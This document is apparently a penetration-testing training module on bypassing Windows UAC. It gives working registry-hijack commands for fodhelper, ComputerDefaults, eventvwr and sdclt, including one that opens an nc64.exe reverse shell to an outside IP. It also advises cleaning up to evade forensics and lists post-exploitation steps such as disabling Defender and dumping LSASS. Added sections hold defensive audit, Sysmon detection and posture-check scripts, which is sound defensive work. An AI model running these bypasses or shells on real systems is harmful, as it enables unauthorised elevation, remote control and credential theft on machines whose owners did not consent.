
UAC Bypass

# Overview

User Account Control (UAC) prevents unauthorized elevation from medium-integrity to high-integrity processes. When a user is in the local Administrators group but running in a medium-integrity context (admin approval mode), UAC bypass techniques obtain a high-integrity process without the UAC consent prompt. They do this by abusing auto-elevated binaries (Windows binaries that elevate without prompting) or by manipulating the registry keys those auto-elevated processes read.

# Prerequisites

  • User in the local Administrators group (check with net localgroup administrators)
  • Running in admin approval mode (medium integrity, not high integrity)
  • Write access to specific registry keys (HKCU)

# Detection & Enumeration

```cmd
rem Check if user is in Administrators group
net user %USERNAME% | findstr /i "Administrators"
net localgroup administrators

rem Check integrity level
whoami /groups | findstr /i "Mandatory Label"
rem Mandatory Label\Medium Mandatory Level -- UAC bypass needed
rem Mandatory Label\High Mandatory Level -- Already elevated, no bypass needed

rem Check UAC level
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
```

```powershell
# PowerShell integrity check
[System.Security.Principal.WindowsIdentity]::GetCurrent().Groups | Where-Object {$_.Value -match "S-1-16"}
# S-1-16-8192 = Medium
# S-1-16-12288 = High
# S-1-16-16384 = System
```

# Exploitation / Execution

# Fodhelper Bypass (Most Common)

```powershell
# fodhelper.exe is an auto-elevated binary that resolves the ms-settings handler
# from the registry; HKCU\Software\Classes takes precedence over HKLM, so a
# user-writable key controls what it launches.
# Exploit by creating a malicious registry key:

reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /d "cmd.exe /c C:\Windows\Temp\nc64.exe 10.10.14.5 4444 -e cmd" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f

# Trigger elevation
fodhelper.exe

# Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f
```

# ComputerDefaults.exe Bypass

```powershell
# ComputerDefaults.exe resolves the same ms-settings handler as fodhelper.exe,
# so the identical HKCU key works:
reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /d "cmd.exe /c C:\Windows\Temp\shell.bat" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f

# Trigger elevation
ComputerDefaults.exe

# Cleanup
reg delete "HKCU\Software\Classes\ms-settings" /f
```

# eventvwr.exe (Event Viewer) Bypass

```powershell
# Event Viewer launches mmc.exe through the mscfile file-type handler, which is
# looked up in the registry (HKCU\Software\Classes overrides HKCR)
# Create a malicious registry entry for that handler:

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "cmd.exe /c C:\Windows\Temp\shell.bat" /f

# Trigger elevation
eventvwr.exe

# Cleanup
reg delete "HKCU\Software\Classes\mscfile" /f
```

# sdclt.exe (Backup and Restore) Bypass

```powershell
# sdclt.exe /kickoffelev launches control.exe, which is resolved through the
# App Paths registry key; the HKCU copy of that key is user-writable
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe /c C:\Windows\Temp\shell.bat" /f

# Trigger by running sdclt with the elevating argument
sdclt.exe /kickoffelev

# Cleanup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
```
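All four bypasses above leave a key under the current user's hive, and the cleanup lines show exactly which ones. The following audit script is an added example and not part of the original module: it walks every loaded user hive under HKEY_USERS, reports any of those keys that exist together with the command they would launch, and can optionally remove them. The function name, the -Remove switch and the output field names are this example's own.

```powershell
# Added example, not part of the original module: audit every loaded user hive for the
# HKCU keys that the fodhelper, ComputerDefaults, eventvwr and sdclt bypasses write to.
# Function, parameter and output field names are this example's own.
function Find-UacBypassRegistryArtifacts {
    [CmdletBinding()]
    param(
        # Delete any key that is found (remediation); the default is report-only.
        [switch]$Remove
    )

    # Paths relative to a user hive, as used by the bypasses on this page.
    $watchedKeys = @(
        'Software\Classes\ms-settings\Shell\open\command',                 # fodhelper / ComputerDefaults
        'Software\Classes\mscfile\shell\open\command',                     # eventvwr
        'Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'  # sdclt /kickoffelev
    )

    # Loaded user hives: S-1-5-21-... SIDs are real accounts; the *_Classes hives are skipped.
    $hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' }

    foreach ($hive in $hives) {
        foreach ($rel in $watchedKeys) {
            $path = "Registry::HKEY_USERS\$($hive.PSChildName)\$rel"
            if (-not (Test-Path -LiteralPath $path)) { continue }

            $props = Get-ItemProperty -LiteralPath $path -ErrorAction SilentlyContinue
            # An empty DelegateExecute value is the marker of the ms-settings variants.
            $delegate = if ($null -ne $props.DelegateExecute) { 'present' } else { 'absent' }

            $finding = [PSCustomObject]@{
                UserSid         = $hive.PSChildName
                Key             = $path
                # The default value is the command line the auto-elevated binary will launch.
                Command         = $props.'(default)'
                DelegateExecute = $delegate
                Removed         = $false
            }

            if ($Remove) {
                # Remove the subtree the bypass created (ms-settings, mscfile or the App Paths
                # entry), mirroring the reg delete cleanup lines above.
                $root = $path -replace '\\shell\\open\\command$', ''
                Remove-Item -LiteralPath $root -Recurse -Force -ErrorAction Stop
                $finding.Removed = $true
            }
            $finding
        }
    }
}

# Report only; add -Remove to delete what is found.
Find-UacBypassRegistryArtifacts | Format-Table -AutoSize
```

Run it from an elevated session to see hives other than your own; a medium-integrity session can only read the current user's hive. A hit on the ms-settings or mscfile key is a strong signal because neither handler is normally present under a user's Classes subtree, whereas a legitimate App Paths\control.exe entry in HKCU is equally unusual but should be checked against the command it points at before removal.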

# Auto-Elevated Binary List

These binaries auto-elevate to high integrity without UAC prompts:

```text
fodhelper.exe           # Features On Demand helper
ComputerDefaults.exe    # Computer defaults configuration
eventvwr.exe            # Event Viewer
sdclt.exe               # Backup and Restore
WSReset.exe             # Windows Store reset
wuauclt.exe             # Windows Update (older)
slui.exe                # Windows Activation
```
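From the defender's side the list above is a parent-process watchlist: these binaries elevate silently, so a high-integrity child that is not part of their normal behaviour is the artefact every technique in this module leaves behind. The script below is an added example, not part of the original module, that reads Sysmon process-creation events (Event ID 1) from the local log and flags children of the listed binaries that run at High integrity. It assumes Sysmon is installed with process creation logging enabled; the function names and the watchlist variable are this example's own.

```powershell
# Added example, not part of the original module: flag Sysmon process-creation events
# where one of the auto-elevated binaries listed above is the parent of a High-integrity
# process. Assumes Sysmon Event ID 1 logging; function and variable names are this example's own.
$AutoElevatedParents = @(
    'fodhelper.exe', 'ComputerDefaults.exe', 'eventvwr.exe', 'sdclt.exe',
    'WSReset.exe', 'wuauclt.exe', 'slui.exe'
)

# Pull the named EventData fields out of one Sysmon ProcessCreate record.
function ConvertFrom-SysmonProcessCreate {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [PSCustomObject]@{
        Time           = $Event.TimeCreated
        User           = $data['User']
        ParentImage    = $data['ParentImage']
        Image          = $data['Image']
        CommandLine    = $data['CommandLine']
        IntegrityLevel = $data['IntegrityLevel']   # Sysmon reports Low/Medium/High/System
    }
}

# The rule: parent is an auto-elevated binary and the child runs at High integrity.
function Test-AutoElevateSpawn {
    param([object]$ProcessEvent)
    $parent = Split-Path -Leaf ([string]$ProcessEvent.ParentImage)
    ($AutoElevatedParents -contains $parent) -and ($ProcessEvent.IntegrityLevel -eq 'High')
}

# Scan the most recent Sysmon process-creation events and return the matches.
function Find-AutoElevateSpawns {
    param([int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object { ConvertFrom-SysmonProcessCreate -Event $_ } |
        Where-Object { Test-AutoElevateSpawn -ProcessEvent $_ }
}

Find-AutoElevateSpawns | Format-Table Time, User, ParentImage, Image, IntegrityLevel -AutoSize
```

Expect some benign hits and tune accordingly: eventvwr.exe legitimately starts mmc.exe at High integrity and sdclt.exe starts control.exe, so in practice the rule is narrowed to shells and script hosts (cmd.exe, powershell.exe, rundll32.exe and the like) as the child image, or to any child whose command line references a user-writable path such as the Temp directory used in the examples above.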

# DLL Hijacking for UAC Bypass

Some auto-elevated processes load DLLs from HKCU-writable paths:

```powershell
# Use Process Monitor to identify DLLs loaded by auto-elevated binaries
# Look for DLLs loaded from user-writable locations (AppData, temp, etc.)
# Create a malicious DLL in the detected path
```

# UACME Project

```bash
# Comprehensive UAC bypass collection: https://github.com/hfiref0x/UACME
# 60+ bypass methods, each with a numeric ID
# Akagi64.exe <method_number>

# Example:
Akagi64.exe 33  # fodhelper method
Akagi64.exe 61  # ComputerDefaults method
```

# Additional UAC Bypass Techniques

```powershell
# CMSTP UAC bypass - uses cmstp.exe and a COM scriptlet
cmstp.exe /s C:\temp\payload.inf
# The INF file references a COM SCT scriptlet; because cmstp.exe runs elevated,
# the commands it executes move from medium integrity to high integrity

# Token Broker UAC bypass - Windows 11 specific
# Exploits the TokenBroker service COM interface
# Reference: https://github.com/hfiref0x/UACME (method 72+)

# Environment Variable UAC bypass
# Manipulates SystemRoot to redirect DLL loading
set SystemRoot=C:\temp\fake
# Create a fake directory structure with malicious DLLs
# Works when certain auto-elevated processes load DLLs relative to SystemRoot

# ICMLuaUtil COM interface bypass
# Uses the ICMLuaUtil COM interface to execute commands at high integrity
# Method 63 in UACME
```

# UAC Consent Level Check

```powershell
# Check UAC consent level - determines which bypasses work
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
# 0 = No prompt (UAC disabled) - all bypasses work
# 1 = Prompt for credentials on secure desktop - most bypasses fail
# 2 = Prompt for consent on secure desktop - most bypasses work
# 3 = Prompt for credentials - most bypasses fail
# 4 = Prompt for consent - most bypasses work
# 5 = Prompt for consent for non-Windows binaries - most bypasses work (default)

# Also check:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
# 0 = UAC disabled entirely (no prompts)
# 1 = UAC enabled
```
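The Detection & Enumeration section and the consent-level check above are the two halves of one question: is this host running a filtered administrator token under a UAC level that still auto-elevates? The function below is an added example, not part of the original module, that gathers both into a single posture object for a host audit. It reads EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop (treating absent values as the Windows defaults of 1, 5 and 1), takes the mandatory label and the Administrators group attributes from whoami /groups, and flags admin approval mode by the "deny only" attribute on the Administrators SID. One caveat worth keeping next to the table above: auto-elevation of Windows binaries, which every registry-based bypass in this module depends on, is applied only at the default level 5 (level 0 simply never prompts); at the other levels AppInfo prompts for every elevation, which is the reason the Common Pitfalls section says Always Notify defeats these bypasses. The function name and output field names are this example's own.

```powershell
# Added example, not part of the original module: combine the integrity and UAC policy
# checks from the sections above into one posture object. Missing registry values are
# treated as the Windows defaults. Function and field names are this example's own.
function Get-UacPosture {
    $policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $policyKey -ErrorAction Stop

    # Defaults: UAC on, level 5 (consent for non-Windows binaries), secure desktop on.
    $enableLua = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $consent   = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDsk = if ($null -ne $p.PromptOnSecureDesktop) { [int]$p.PromptOnSecureDesktop } else { 1 }

    # Token facts from whoami: the mandatory label row and the Administrators row.
    $groups   = whoami /groups /fo csv | ConvertFrom-Csv
    $labelSid = ($groups | Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1).SID
    $adminRow = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }

    $integrity = switch ($labelSid) {
        'S-1-16-8192'  { 'Medium' }
        'S-1-16-12288' { 'High' }
        'S-1-16-16384' { 'System' }
        default        { $labelSid }
    }
    # Admin approval mode: Administrators is in the token but marked "used for deny only".
    $adminApproval = [bool]$adminRow -and ($adminRow.Attributes -match 'deny only')

    # Auto-elevation of Windows binaries is granted only at level 5; level 0 never prompts.
    $posture = if ($enableLua -eq 0 -or $consent -eq 0) {
        'UAC disabled or never-notify: no elevation prompts at all'
    } elseif ($consent -eq 5) {
        'Default level: auto-elevated binaries run without a prompt'
    } else {
        "Level $consent: every elevation prompts, auto-elevation is not granted"
    }

    [PSCustomObject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $consent
        PromptOnSecureDesktop      = $secureDsk
        IntegrityLevel             = $integrity
        AdminApprovalMode          = $adminApproval
        # The condition the bypasses on this page rely on: filtered admin token at the default level.
        ExposedToAutoElevateAbuse  = ($adminApproval -and $integrity -eq 'Medium' -and $enableLua -eq 1 -and $consent -eq 5)
        Posture                    = $posture
    }
}

Get-UacPosture | Format-List
```

ExposedToAutoElevateAbuse is true on a stock workstation for any member of Administrators, which is the normal state of most Windows estates; the mitigation is not a registry tweak on the level alone but running day-to-day sessions as a standard user and, where the prompt cost is acceptable, setting Always Notify (ConsentPromptBehaviorAdmin 2 with PromptOnSecureDesktop 1) on administrator accounts.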

# Common Pitfalls

  • UAC must be set to one of the lower levels (not "Always Notify"); the default level works for most bypasses
  • Admin approval mode must be enabled (user is administrator but running in medium integrity)
  • Registry keys must be created in HKCU (current user registry hive) which is always writable
  • Some bypasses only work on specific Windows versions (Windows 10 vs 11, specific builds)
  • Microsoft Defender may flag UAC bypass techniques and auto-elevated binary abuse
  • The spawned process is high integrity but NOT SYSTEM -- further escalation may be needed

# OPSEC Considerations

  • Registry key creation in HKCU is standard behavior and not monitored by default.
  • Running auto-elevated binaries triggers application compatibility telemetry in Windows.
  • The spawned high-integrity process creates a visible process tree that may be anomalous.
  • UAC bypass is a well-known technique; many EDR products monitor for registry keys associated with known bypasses.
  • Clean up registry keys after exploitation to reduce forensic evidence.
  • The bypass itself is not logged in the Security event log (no event 4688 for the elevated process with special privileges).

# Post-Exploitation Value

UAC bypass provides high-integrity (Administrator) access. From high integrity: disable Defender (Set-MpPreference), dump LSASS (requires SeDebugPrivilege which admins have), install services, modify system configurations, and perform most administrative functions. Full SYSTEM escalation may require additional steps (service creation, token stealing).

# Cross-References

# Tool References

| Tool  | Link                              |
|-------|-----------------------------------|
| UACME | https://github.com/hfiref0x/UACME |

# Source Machines

  • Generic Windows - UAC bypass via fodhelper, ComputerDefaults, or eventvwr